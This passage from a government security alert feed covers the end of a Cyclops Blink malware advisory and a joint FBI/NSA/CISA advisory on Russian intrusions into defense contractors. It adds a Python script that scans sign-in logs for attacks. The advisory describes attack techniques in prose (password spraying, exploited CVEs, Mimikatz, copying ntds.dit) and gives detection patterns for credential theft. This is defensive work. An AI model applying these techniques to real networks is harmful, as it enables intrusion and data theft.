Victim devices are organized into clusters and each deployment of Cyclops Blink has a list of command and control (C2) IP addresses and ports that it uses (T1008). All the known C2 IP addresses to date have been used by compromised WatchGuard firewall devices. Communications between Cyclops Blink clients and servers are protected under Transport Layer Security (TLS) (T1071.001), using individually generated keys and certificates. Sandworm manages Cyclops Blink by connecting to the C2 layer through the Tor network.

Mitigations

Cyclops Blink persists on reboot and throughout the legitimate firmware update process. Affected organizations should therefore take steps to remove the malware. 

WatchGuard has worked closely with the FBI, CISA, NSA and the NCSC, and has provided tooling and guidance to enable detection and removal of Cyclops Blink on WatchGuard devices through a non-standard upgrade process. Device owners should follow each step in these instructions to ensure that devices are patched to the latest version and that any infection is removed.

The tooling and guidance from WatchGuard can be found at: https://detection.watchguard.com/.

In addition:

  • If your device is identified as infected with Cyclops Blink, you should assume that any passwords present on the device have been compromised and replace them (see NCSC password guidance for organizations).
  • You should ensure that the management interface of network devices is not exposed to the internet.
Indicators of Compromise

Please refer to the accompanying Cyclops Blink malware analysis report for indicators of compromise which may help detect this activity. 

MITRE ATT&CK®

This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

Tactic | Technique | Procedure
Initial Access | T1133 External Remote Services | The actors most likely deploy modified device firmware images by exploiting an externally available service
Execution | T1059.004 Command and Scripting Interpreter: Unix Shell | Cyclops Blink executes downloaded files using the Linux API
Persistence | T1542.001 Pre-OS Boot: System Firmware | Cyclops Blink is deployed within a modified device firmware image
Persistence | T1037.004 Boot or Logon Initialization Scripts: RC Scripts | Cyclops Blink is executed on device startup, using a modified RC script
Defense Evasion | T1562.004 Impair Defenses: Disable or Modify System Firewall | Cyclops Blink modifies the Linux system firewall to enable C2 communication
Defense Evasion | T1036.005 Masquerading: Match Legitimate Name or Location | Cyclops Blink masquerades as a Linux kernel thread process
Discovery | T1082 System Information Discovery | Cyclops Blink regularly queries device information
Command and Control | T1090 Proxy |
Command and Control | T1132.002 Data Encoding: Non-Standard Encoding | Cyclops Blink command messages use a custom binary scheme to encode data
Command and Control | T1008 Fallback Channels | Cyclops Blink randomly selects a C2 server from contained lists of IPv4 addresses and port numbers
Command and Control | T1071.001 Application Layer Protocol: Web Protocols | Cyclops Blink can download files via HTTP or HTTPS
Command and Control | T1573.002 Encrypted Channel: Asymmetric Cryptography | Cyclops Blink C2 messages are individually encrypted using AES-256-CBC and sent underneath TLS
Command and Control | T1571 Non-Standard Port | The list of port numbers used by Cyclops Blink includes non-standard ports not typically associated with HTTP or HTTPS traffic
Exfiltration | T1041 Exfiltration Over C2 Channel | Cyclops Blink can upload files to a C2 server

A Cyclops Blink infection does not mean that an organization is the primary target, but it may be selected to be, or its machines could be used to conduct attacks.

Organizations are advised to follow the mitigation advice in this advisory to defend against this activity, and to refer to indicators of compromise (not exhaustive) in the Cyclops Blink malware analysis report to detect possible activity on networks. 

UK organizations affected by the activity outlined should report any suspected compromises to the NCSC at https://report.ncsc.gov.uk/.

Further Guidance

A variety of mitigations will be of use in defending against the malware featured in this advisory:

About This Document

This advisory is the result of a collaborative effort by United Kingdom’s National Cyber Security Centre (NCSC), the United States’ National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA). 

CISA, FBI, and NSA agree with this attribution and the details provided in the report.

Disclaimers

This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.

Disclaimer of Endorsement: The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov.

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory:

U.S. organizations contact your local FBI field office at fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

Australian organizations should report incidents to the Australian Signals Directorate’s (ASD’s) ACSC via cyber.gov.au or call 1300 292 371 (1300 CYBER 1).

U.K. organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hrs) or for urgent assistance, call 03000 200 973.

Revisions
  • February 23, 2022: Initial Version


AA22-047A: Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology

US-CERT Security Alerts - Wed, 02/16/2022 - 07:00
Original release date: February 16, 2022
Summary

Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:
• Enforce multifactor authentication.
• Enforce strong, unique passwords.
• Enable M365 Unified Audit Logs.
• Implement endpoint detection and response tools.

From at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:

  • Command, control, communications, and combat systems;
  • Intelligence, surveillance, reconnaissance, and targeting;
  • Weapons and missile development;
  • Vehicle and aircraft design; and
  • Software development, data analytics, computers, and logistics. 

Historically, Russian state-sponsored cyber actors have used common but effective tactics to gain access to target networks, including spearphishing, credential harvesting, brute force/password spray techniques, and known vulnerability exploitation against accounts and networks with weak security. These actors take advantage of simple passwords, unpatched systems, and unsuspecting employees to gain initial access before moving laterally through the network to establish persistence and exfiltrate data. 

In many attempted compromises, these actors have employed similar tactics to gain access to enterprise and cloud networks, prioritizing their efforts against the widely used Microsoft 365 (M365) environment. The actors often maintain persistence by using legitimate credentials and a variety of malware when exfiltrating emails and data.

These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology. The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology. By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment. Given the sensitivity of information widely available on unclassified CDC networks, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target CDCs for U.S. defense information in the near future. These agencies encourage all CDCs to apply the recommended mitigations in this advisory, regardless of evidence of compromise.

For additional information on Russian state-sponsored cyber activity, see CISA's webpage, Russia Cyber Threat Overview and Advisories.


Threat Details

Targeted Industries and Assessed Motive

Russian state-sponsored cyber actors have targeted U.S. CDCs from at least January 2020, through February 2022. The actors leverage access to CDC networks to obtain sensitive data about U.S. defense and intelligence programs and capabilities. Compromised entities have included CDCs supporting the U.S. Army, U.S. Air Force, U.S. Navy, U.S. Space Force, and DoD and Intelligence programs.

During this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months. In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company’s products, relationships with other countries, and internal personnel and legal matters.

Through these intrusions, the threat actors have acquired unclassified CDC-proprietary and export-controlled information. This theft has granted the actors significant insight into U.S. weapons platforms development and deployment timelines, plans for communications infrastructure, and specific technologies employed by the U.S. government and military. Although many contract awards and descriptions are publicly accessible, program developments and internal company communications remain sensitive. Unclassified emails among employees or with government customers often contain proprietary details about technological and scientific research, in addition to program updates and funding statuses. See figures 1 and 2 for information on targeted customers, industries, and information.

 

Figure 1. Targeted Industries

Figure 2. Exfiltrated Information

Threat Actor Activity

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. See the Tactics, Techniques, and Procedures (TTPs) section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access 

Russian state-sponsored cyber actors use brute force methods, spearphishing, harvested credentials, and known vulnerabilities to gain initial access to CDC networks.

  • Threat actors use brute force techniques [T1110] to identify valid account credentials [T1589.001] for domain and M365 accounts. After obtaining domain credentials, the actors use them to gain initial access to the networks. Note: For more information, see joint NSA-FBI-CISA Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.
  • Threat actors send spearphishing emails with links to malicious domains [T1566.002] and use publicly available URL shortening services to mask the link [T1027]. Embedding shortened URLs instead of actor-controlled malicious domains is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient, increasing the probability of a victim’s clicking on the link. 
  • The threat actors use harvested credentials in conjunction with known vulnerabilities—for example, CVE-2020-0688 and CVE-2020-17144—on public-facing applications [T1078, T1190], such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications.[1] In addition, threat actors have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. 
  • As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access. This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.
Credential Access 

After gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database ntds.dit [T1003.003]. In multiple instances, the threat actors have used Mimikatz to dump admin credentials from the domain controllers. 

Collection

Using compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources, including SharePoint pages [T1213.002], user profiles, and user emails [T1114.002].

Command and Control

The threat actors routinely use virtual private servers (VPSs) as an encrypted proxy. The actors use VPSs, as well as small office and home office (SOHO) devices, as operational nodes to evade detection [T1090.003].

Persistence

In multiple instances, the threat actors maintained persistent access for at least six months. Although the actors have used a variety of malware to maintain persistence, the FBI, NSA, and CISA have also observed intrusions that did not rely on malware or other persistence mechanisms. In these cases, it is likely the threat actors relied on possession of legitimate credentials for persistence [T1078], enabling them to pivot to other accounts, as needed, to maintain access to the compromised environments.

Tactics, Techniques, and Procedures

The following table maps observed Russian state-sponsored cyber activity to the MITRE ATT&CK for Enterprise framework. Several of the techniques listed in the table are based on observed procedures in contextual order. Therefore, some of the tactics and techniques listed in their respective columns appear more than once. See Appendix A for a functional breakdown of TTPs. Note: for specific countermeasures related to each ATT&CK technique, see the Enterprise Mitigations section and MITRE D3FEND™.
 

Table 1: Observed Tactics, Techniques, and Procedures (TTPs)

Tactic: Reconnaissance [TA0043]; Credential Access [TA0006]
Technique: Gather Victim Identity Information: Credentials [T1589.001]; Brute Force [T1110]
Procedure: Threat actors used brute force to identify valid account credentials for domain and M365 accounts. After obtaining domain credentials, the actors used them to gain initial access.

Tactic: Initial Access [TA0001]
Technique: External Remote Services [T1133]
Procedure: Threat actors continue to research vulnerabilities in Fortinet’s FortiGate VPN devices, conducting brute force attacks and leveraging CVE-2018-13379 to gain credentials to access victim networks. [2]

Tactic: Initial Access [TA0001]; Privilege Escalation [TA0004]
Technique: Valid Accounts [T1078]; Exploit Public-Facing Application [T1190]
Procedure: Threat actors used credentials in conjunction with known vulnerabilities on public-facing applications, such as virtual private networks (VPNs)—CVE-2020-0688 and CVE-2020-17144—to escalate privileges and gain remote code execution (RCE) on the exposed applications. [3]

Tactic: Initial Access [TA0001]; Defense Evasion [TA0005]
Technique: Phishing: Spearphishing Link [T1566.002]; Obfuscated Files or Information [T1027]
Procedure: Threat actors sent spearphishing emails using publicly available URL shortening services. Embedding shortened URLs instead of the actor-controlled malicious domain is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient and thereby increases the possibility that a victim clicks on the link.

Tactic: Initial Access [TA0001]; Credential Access [TA0006]
Technique: OS Credential Dumping: NTDS [T1003.003]; Valid Accounts: Domain Accounts [T1078.002]
Procedure: Threat actors logged into a victim’s VPN server and connected to the domain controllers, from which they exfiltrated credentials and exported copies of the AD database ntds.dit.

Tactic: Initial Access [TA0001]; Privilege Escalation [TA0004]; Collection [TA0009]
Technique: Valid Accounts: Cloud Accounts [T1078.004]; Data from Information Repositories: SharePoint [T1213.002]
Procedure: In one case, the actors used valid credentials of a global admin account within the M365 tenant to log into the administrative portal and change permissions of an existing enterprise application to give read access to all SharePoint pages in the environment, as well as tenant user profiles and email inboxes.

Tactic: Initial Access [TA0001]; Collection [TA0009]
Technique: Valid Accounts: Domain Accounts [T1078.002]; Email Collection [T1114]
Procedure: In one case, the threat actors used legitimate credentials to exfiltrate emails from the victim's enterprise email system.

Tactic: Persistence [TA0003]; Lateral Movement [TA0008]
Technique: Valid Accounts [T1078]
Procedure: Threat actors used valid accounts for persistence. After some victims reset passwords for individually compromised accounts, the actors pivoted to other accounts, as needed, to maintain access.

Tactic: Discovery [TA0007]
Technique: File and Network Discovery [T1083]
Procedure: After gaining access to networks, the threat actors used BloodHound to map the Active Directory.

Tactic: Discovery [TA0007]
Technique: Domain Trust Discovery [T1482]
Procedure: Threat actors gathered information on domain trust relationships that were used to identify lateral movement opportunities.

Tactic: Command and Control [TA0011]
Technique: Proxy: Multi-hop Proxy [T1090.003]
Procedure: Threat actors used multiple disparate nodes, such as VPSs, to route traffic to the target.

Detection

The FBI, NSA, and CISA urge all CDCs to investigate suspicious activity in their enterprise and cloud environments. Note: for additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Detect Unusual Activity

Implement robust log collection and retention. Robust logging is critical for detecting unusual activity. Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, tools and solutions include:

  • Cloud native solutions, such as cloud-native security incident and event management (SIEM) tools.
  • Third-party tools, such as Sparrow, to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. Note: for guidance on using these and other detection tools, refer to CISA Cybersecurity Advisory Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments.
Look for Evidence of Known TTPs
  • Look for behavioral evidence or network and host-based artifacts from known TTPs associated with this activity. To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for frequent, failed authentication attempts across multiple accounts. 
  • To detect use of compromised credentials in combination with a VPS, follow the steps below:
    • Review logs for suspicious “impossible logins,” such as logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location.
    • Look for one IP used for multiple accounts, excluding expected logins.
    • Search for “impossible travel,” which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). Note: this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks.
    • Evaluate processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the ntds.dit file from a domain controller. 
    • Identify suspicious privileged account use after resetting passwords or applying user account mitigations. 
    • Review logs for unusual activity in typically dormant accounts.
    • Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.
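
The sign-in checks listed above (failed logins across many accounts, one IP used for multiple accounts, and impossible travel) can be run over exported authentication logs. The following is an added example, not code from the advisory or its authoring agencies; the record layout, thresholds, function names, and sample events are assumptions constructed for illustration.

```python
"""Sign-in log checks for password spray, shared source IPs and impossible travel.
Every record, field name and threshold here is constructed for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

# Constructed records: (UTC time, user, source IP, success, latitude, longitude).
# IPs come from the RFC 5737 documentation ranges; coordinates stand in for GeoIP output.
SAMPLE_EVENTS = [
    ("2022-02-01T07:00:00", "alice", "192.0.2.10",   True,  38.90, -77.04),
    ("2022-02-01T07:05:00", "bob",   "192.0.2.10",   True,  38.90, -77.04),
    ("2022-02-01T07:30:00", "dave",  "192.0.2.10",   True,  38.90, -77.04),
    ("2022-02-01T08:00:00", "alice", "203.0.113.50", False, 52.37,   4.90),
    ("2022-02-01T08:01:00", "bob",   "203.0.113.50", False, 52.37,   4.90),
    ("2022-02-01T08:02:00", "carol", "203.0.113.50", False, 52.37,   4.90),
    ("2022-02-01T08:03:00", "erin",  "203.0.113.50", False, 52.37,   4.90),
    ("2022-02-01T08:05:00", "dave",  "203.0.113.50", True,  52.37,   4.90),
    ("2022-02-01T08:20:00", "frank", "203.0.113.50", True,  52.37,   4.90),
    ("2022-02-01T18:55:00", "alice", "198.51.100.7", False, 38.98, -77.10),
    ("2022-02-01T19:00:00", "alice", "198.51.100.7", True,  38.98, -77.10),
]


def load(rows):
    """Turn raw tuples into dicts with parsed timestamps."""
    keys = ("time", "user", "ip", "ok", "lat", "lon")
    events = [dict(zip(keys, row)) for row in rows]
    for event in events:
        event["time"] = datetime.fromisoformat(event["time"])
    return events


def password_spray(events, min_accounts=4, window=timedelta(minutes=10)):
    """Source IPs that failed against >= min_accounts distinct users inside one window."""
    failures = defaultdict(list)
    for e in events:
        if not e["ok"]:
            failures[e["ip"]].append((e["time"], e["user"]))
    hits = {}
    for ip, rows in failures.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Slide the window start forward until it spans at most `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            users = {user for _, user in rows[start:end + 1]}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users | set(hits.get(ip, [])))
    return hits


def shared_source(events, expected=frozenset(), min_accounts=2):
    """IPs with successful logins for several accounts, minus expected egress IPs."""
    users = defaultdict(set)
    for e in events:
        if e["ok"] and e["ip"] not in expected:
            users[e["ip"]].add(e["user"])
    return {ip: sorted(u) for ip, u in users.items() if len(u) >= min_accounts}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def impossible_travel(events, max_kmh=900.0, min_km=50.0):
    """Consecutive successful logins per user whose implied speed exceeds max_kmh.

    Legitimate VPN use produces false positives here, so treat hits as leads.
    """
    last_seen = {}
    findings = []
    for e in sorted(events, key=lambda item: item["time"]):
        if not e["ok"]:
            continue
        prev = last_seen.get(e["user"])
        last_seen[e["user"]] = e
        if prev is None or prev["ip"] == e["ip"]:
            continue
        km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
        hours = (e["time"] - prev["time"]).total_seconds() / 3600
        if km > min_km and (hours == 0 or km / hours > max_kmh):
            findings.append((e["user"], prev["ip"], e["ip"], round(km)))
    return findings


if __name__ == "__main__":
    evts = load(SAMPLE_EVENTS)
    print("spray:", password_spray(evts))
    print("shared source:", shared_source(evts, expected={"192.0.2.10"}))
    print("impossible travel:", impossible_travel(evts))
```

Pass known corporate egress addresses in `expected` so that office NAT traffic does not swamp the shared-source results.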
Incident Response and Remediation

Organizations with evidence of compromise should assume full identity compromise and initiate a full identity reset.

  • Reset passwords for all local accounts. These accounts should include Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. It is essential to reset the password for the krbtgt account, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. Note: reset the krbtgt account twice and consecutively with a 10-hour waiting period between resets (i.e., perform the first krbtgt password reset, wait 10 hours, and then follow with a second krbtgt password reset). The krbtgt password resets may take a long time to propagate fully on large AD environments. Refer to Microsoft’s AD Forest Recovery - Resetting the krbtgt password guidance and automation script for additional information. [4][5]
  • Reset all domain user, admin, and service account passwords. 

Note: for guidance on evicting advanced persistent threat (APT) actors from cloud and enterprise environments, refer to CISA Analysis Report Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/Microsoft 365 (M365) Compromise. Although this guidance was drafted for federal agencies compromised by the Russian Foreign Intelligence Service (SVR) via the SolarWinds Orion supply chain compromise, the steps provided in the Eviction Phase are applicable for all organizations crafting eviction plans for suspected APT actors.

Mitigations

The FBI, NSA, and CISA encourage all CDCs, with or without evidence of compromise, to apply the following mitigations to reduce the risk of compromise by this threat actor. While these mitigations are not intended to be all-encompassing, they address common TTPs observed in these intrusions and will help to mitigate against common malicious activity. 

Implement Credential Hardening

Enable Multifactor Authentication
  • Enable multifactor authentication (MFA) for all users, without exception. Subsequent authentication may not require MFA, enabling the possibility to bypass MFA by reusing single factor authentication assertions (e.g., Kerberos authentication). Reducing the lifetime of assertions will cause account re-validation of their MFA requirements.[6] Service accounts should not use MFA. Automation and platform features (e.g., Group Managed Service Accounts, gMSA) can provide automatic and periodic complex password management for service accounts, reducing the threat surface against single factor authentication assertions.[7]
Enforce Strong, Unique Passwords
  • Require accounts to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
  • Enable password management functions, such as Local Administrator Password Solution (LAPS), for local administrative accounts. This will reduce the burden of users managing passwords and encourage them to have strong passwords.
Introduce Account Lockout and Time-Based Access Features
  • Implement time-out and lock-out features in response to repeated failed login attempts.
  • Configure time-based access for accounts set at the admin level and higher. For example, the Just-In-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When the account is needed, individual users submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.
Reduce Credential Exposure
  • Use virtualization solutions on modern hardware and software to ensure credentials are securely stored, and protect credentials via capabilities, such as Windows Defender Credential Guard (CredGuard) and Trusted Platform Module (TPM).[8] Protecting domain credentials with CredGuard requires configuration and has limitations in protecting other types of credentials (e.g., WDigest and local accounts).[9][10] CredGuard uses TPMs to protect stored credentials. TPMs function as a system integrity observer and trust anchor ensuring the integrity of the boot sequence and mechanisms (e.g., UEFI Secure Boot). Installation of Windows 11 requires TPM v2.0.[11] Disabling WDigest and rolling expiring NTLM secrets in smartcards will further protect other credentials not protected by CredGuard.[12][13]
Establish Centralized Log Management
  • Create a centralized log management system. Centralized logging applications allow network defenders to look for anomalous activity, such as out-of-place communications between devices or unaccountable login failures, in the network environment. 
    • Forward all logs to a SIEM tool.
    • Ensure logs are searchable.
    • Retain critical and historic network activity logs for a minimum of 180 days. 
  • If using M365, enable Unified Audit Log (UAL)—M365’s logging capability—which contains events from Exchange Online, SharePoint Online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other M365 services.
  • Correlate logs, including M365 logs, from network and host security devices. This correlation will help with detecting anomalous activity in the network environment and connecting it with potential anomalous activity in M365. 

In addition to setting up centralized logging, organizations should:

  • Ensure PowerShell logging is turned on. Threat actors often use PowerShell to hide their malicious activities.[14] 
  • Update PowerShell instances to version 5.0 or later and uninstall all earlier versions of PowerShell. Logs from prior versions are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities. 
  • Confirm PowerShell 5.0 instances have module, script block, and transcription logging enabled.
  • Monitor remote access/Remote Desktop Protocol (RDP) logs and disable unused remote access/RDP ports.
Initiate a Software and Patch Management Program 
  • Consider using a centralized patch management system. Failure to deploy software patches in a timely manner makes an organization a target of opportunity, increasing its risk of compromise. Organizations can ensure timely patching of software vulnerabilities by implementing an enterprise-wide software and patch management program.[15]
    • If an organization is unable to update all software shortly after a patch is released, prioritize patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential adversaries (such as internet-facing systems). 
    • Subscribe to CISA cybersecurity notifications and advisories to keep up with known exploited vulnerabilities, security updates, and threats. This will assist organizations in maintaining situational awareness of critical software vulnerabilities and, if applicable, associated exploitation. 
  • Sign up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats. CISA’s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IPs for accessible services and vulnerabilities.
Employ Antivirus Programs 
  • Ensure that antivirus applications are installed on all organizations’ computers and are configured to prevent spyware, adware, and malware as part of the operating system security baseline. 
  • Keep virus definitions up to date.
  • Regularly monitor antivirus scans. 
Use Endpoint Detection and Response Tools 
  • Utilize endpoint detection and response (EDR) tools. These tools allow a high degree of visibility into the security status of endpoints and can be an effective defense against threat actors. EDR tools are particularly useful for detecting lateral movement, as they have insight into common and uncommon network connections for each host. 
Maintain Rigorous Configuration Management Programs 
  • Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Having a robust configuration program hinders sophisticated threat operations by limiting the effectiveness of opportunistic attacks.[16]
Enforce the Principle of Least Privilege
  • Apply the principle of least privilege. Administrator accounts should have the minimum permissions they need to do their tasks. This can reduce the impact if an administrator account is compromised.  
  • For M365, assign administrator roles to role-based access control (RBAC) to implement the principle of least privilege. Given its high level of default privilege, you should only use the Global Administrator account when absolutely necessary. Using Azure AD’s numerous other built-in administrator roles instead of the Global Administrator account can limit assigning unnecessary privileges. Note: refer to the Microsoft documentation, Azure AD built-in roles, for more information about Azure AD. 
  • Remove privileges not expressly required by an account’s function or role. 
  • Ensure there are unique and distinct administrative accounts for each set of administrative tasks. 
  • Create non-privileged accounts for privileged users, and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
  • Reduce the number of domain and enterprise administrator accounts, and remove all accounts that are unnecessary.
  • Regularly audit administrative user accounts.
  • Regularly audit logs to ensure new accounts are legitimate users.
  • Institute a group policy that disables remote interactive logins, and use Domain Protected Users Group.

To assist with identifying suspicious behavior with administrative accounts:

  • Create privileged role tracking.
  • Create a change control process for all privilege escalations and role changes on user accounts.
  • Enable alerts on privilege escalations and role changes.
  • Log privileged user changes in the network environment, and create an alert for unusual events.
Review Trust Relationships
  • Review existing trust relationships with IT service providers, such as managed service providers (MSPs) and cloud service providers (CSPs). Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data.  
  • Remove unnecessary trust relationships.  
  • Review contractual relationships with all service providers, and ensure contracts include: 
    • Security controls the customer deems appropriate. 
    • Appropriate monitoring and logging of provider-managed customer systems.
    • Appropriate monitoring of the service provider’s presence, activities, and connections to the customer network.
    • Notification of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks.

Note: review CISA’s page on APTs Targeting IT Service Provider Customers and CISA Insights: Mitigations and Hardening Guidance for MSPs and Small and Mid-sized Businesses for additional recommendations for MSP and CSP customers.

Encourage Remote Work Environment Best Practices

With the increase in remote work and use of VPN services due to COVID-19, the FBI, NSA, and CISA encourage regularly monitoring remote network traffic, along with employing the following best practices. Note: for additional information, see joint NSA-CISA Cybersecurity Information Sheet: Selecting and Hardening Remote Access VPN Solutions.

  • Regularly update VPNs, network infrastructure devices, and devices used for remote work environments with the latest software patches and security configurations.
  • When possible, require MFA on all VPN connections. Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, mandate that employees engaging in remote work use strong passwords.
  • Monitor network traffic for unapproved and unexpected protocols.
  • Reduce potential attack surfaces by discontinuing unused VPN servers that may be used as a point of entry by adversaries.
Establish User Awareness Best Practices

Cyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI, NSA, and CISA recommend the following best practices to improve employee operational security when conducting business:

  • Provide end user awareness and training. To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and how they are delivered. Also, provide users with training on information security principles and techniques.
  • Inform employees of the risks of social engineering attacks, e.g., risks associated with posting detailed career information to social or professional networking sites.
  • Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyber intrusion to help quickly and efficiently identify threats and employ mitigation strategies.
Apply Additional Best Practice Mitigations
  • Deny atypical inbound activity from known anonymization services, including commercial VPN services and The Onion Router (TOR).
  • Impose listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Identify and create offline backups for critical assets.
  • Implement network segmentation.
  • Review CISA Alert AA20-120A: Microsoft Office 365 Security Recommendations for additional recommendations on hardening M365 cloud environments.
Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which the Department is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact (202) 702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details, refer to rewardsforjustice.net.

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, NSA, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, NSA, or CISA. 

Contact Information

To report suspicious activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov. For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at (410) 854-4200 or Cybersecurity_Requests@nsa.gov. Defense Industrial Base companies may additionally sign up for NSA’s free cybersecurity services, including Protective DNS, vulnerability scanning, and threat intelligence collaboration at dib_defense@cyber.nsa.gov

Appendix: Detailed Tactics, Techniques, and Procedures

Reconnaissance [TA0043]

Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. The adversary is known for harvesting login credentials [T1589.001].[17]

 

ID | Name | Description
